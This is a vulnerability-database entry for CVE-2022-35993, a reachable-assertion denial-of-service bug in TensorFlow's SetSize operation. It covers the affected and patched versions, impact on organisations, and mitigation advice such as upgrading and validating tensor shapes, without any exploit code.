Skip to main content

CVE-2022-35993: CWE-617: Reachable Assertion in tensorflow tensorflow

Medium
Published: Fri Sep 16 2022 (09/16/2022, 22:20:25 UTC)
Source: CVE
Vendor/Project: tensorflow
Product: tensorflow

Description

TensorFlow is an open source platform for machine learning. When `SetSize` receives an input `set_shape` that is not a 1D tensor, it gives a `CHECK` fails that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit cf70b79d2662c0d3c6af74583641e345fc939467. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.

AI-Powered Analysis

AILast updated: 06/22/2025, 18:20:40 UTC

Technical Analysis

CVE-2022-35993 is a medium-severity vulnerability identified in TensorFlow, an open-source machine learning platform widely used for developing and deploying machine learning models. The vulnerability arises from a reachable assertion failure (CWE-617) in the TensorFlow codebase within the `SetSize` function. Specifically, when the `SetSize` function receives an input parameter `set_shape` that is not a one-dimensional tensor as expected, it triggers a `CHECK` failure. This assertion failure causes the TensorFlow process to terminate unexpectedly, effectively resulting in a denial of service (DoS) condition. The issue affects multiple TensorFlow versions: all versions prior to 2.7.2, versions from 2.8.0 up to but not including 2.8.1, and versions from 2.9.0 up to but not including 2.9.1. The vulnerability has been patched in TensorFlow 2.10.0 and backported to 2.7.2, 2.8.1, and 2.9.1. There are no known workarounds for this issue, meaning that unpatched systems remain vulnerable to potential DoS attacks if they process malformed input tensors. No exploits are currently known to be active in the wild. The vulnerability does not require authentication or user interaction to be triggered, but it requires the attacker to supply specifically crafted input data to the TensorFlow processing pipeline that causes the assertion failure. This vulnerability impacts the availability of TensorFlow-based services by causing crashes, which can disrupt machine learning workflows, model training, or inference services relying on TensorFlow.

Potential Impact

For European organizations leveraging TensorFlow in production environments—such as research institutions, technology companies, financial services, healthcare providers, and industrial automation firms—this vulnerability poses a risk of service disruption. Since TensorFlow is often integrated into critical AI and data processing pipelines, a denial of service could halt model training or inference, leading to operational delays and potential financial losses. In sectors like healthcare or autonomous systems, such interruptions could have safety implications or degrade service quality. Additionally, organizations providing AI-as-a-Service or cloud-based machine learning platforms may face customer dissatisfaction or SLA breaches if their TensorFlow instances are exploited. Although the vulnerability does not lead to data leakage or integrity compromise, the availability impact alone can be significant, especially in high-availability or real-time environments. The lack of known exploits reduces immediate risk, but the ease of triggering the assertion failure with malformed input means attackers with access to input channels could cause disruptions. This is particularly relevant for organizations exposing TensorFlow inference APIs or accepting untrusted input data streams.

Mitigation Recommendations

To mitigate this vulnerability, European organizations should prioritize upgrading TensorFlow installations to version 2.10.0 or later, or apply the relevant patches backported to versions 2.7.2, 2.8.1, or 2.9.1 as appropriate. Given the absence of workarounds, patching is the primary defense. Organizations should audit their environments to identify all TensorFlow deployments, including embedded or containerized instances, to ensure comprehensive patch coverage. Additionally, input validation should be strengthened at the application layer to verify tensor shapes before passing data to TensorFlow, thereby preventing malformed inputs from reaching vulnerable code paths. Implementing rate limiting and anomaly detection on input data streams can help detect and block attempts to exploit this vulnerability. For publicly exposed TensorFlow services, consider adding network-level protections such as web application firewalls (WAFs) or API gateways that can filter suspicious payloads. Monitoring logs for unexpected TensorFlow crashes or assertion failures can provide early warning of exploitation attempts. Finally, organizations should integrate this vulnerability into their incident response plans and conduct staff training to recognize and respond to potential DoS incidents related to TensorFlow.

Need more detailed analysis?Get Pro

Technical Details

Data Version
5.1
Assigner Short Name
GitHub_M
Date Reserved
2022-07-15T00:00:00.000Z
Cisa Enriched
true

Threat ID: 682d9845c4522896dcbf42e0

Added to database: 5/21/2025, 9:09:25 AM

Last enriched: 6/22/2025, 6:20:40 PM

Last updated: 8/12/2025, 9:24:05 AM

Views: 11

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Latest Threats